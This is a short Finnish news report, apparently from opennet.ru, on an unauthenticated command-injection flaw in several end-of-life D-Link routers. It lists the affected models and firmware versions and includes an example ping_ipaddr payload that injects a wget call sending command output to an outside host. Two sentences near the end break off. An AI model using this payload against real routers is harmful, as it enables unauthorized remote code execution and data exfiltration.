Langattomissa D-Link-reitittimissä
Mielenkiintoista on, että laiteohjelmistokehittäjien mukaan "ping_test"-kutsu tulisi suorittaa vasta todennuksen jälkeen, mutta todellisuudessa sitä kutsutaan joka tapauksessa, verkkokäyttöliittymään kirjautumisesta riippumatta. Erityisesti, kun käytät application_sec.cgi-komentosarjaa ja välität parametrin "action=ping_test", komentosarja ohjaa todennussivulle, mutta suorittaa samalla ping_testiin liittyvän toiminnon. Koodin suorittamiseen käytettiin toista haavoittuvuutta itse ping_testissä, joka kutsuu ping-apuohjelman tarkistamatta kunnolla testattavaksi lähetetyn IP-osoitteen oikeellisuutta. Jos haluat esimerkiksi kutsua wget-apuohjelman ja siirtää komennon "echo 1234" tulokset ulkoiseen isäntään, määritä parametri "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".
Haavoittuvuuden olemassaolo on virallisesti vahvistettu seuraavissa malleissa:
- DIR-655 laiteohjelmistolla 3.02b05 tai vanhempi;
- DIR-866L laiteohjelmistolla 1.03b04 tai vanhempi;
- DIR-1565 laiteohjelmistolla 1.01 tai vanhempi;
- DIR-652 (ongelmista laiteohjelmistoversioista ei anneta tietoja)
Näiden mallien tukiaika on jo umpeutunut, joten D-Link
Myöhemmin selvisi, että haavoittuvuus oli myös
Lähde: opennet.ru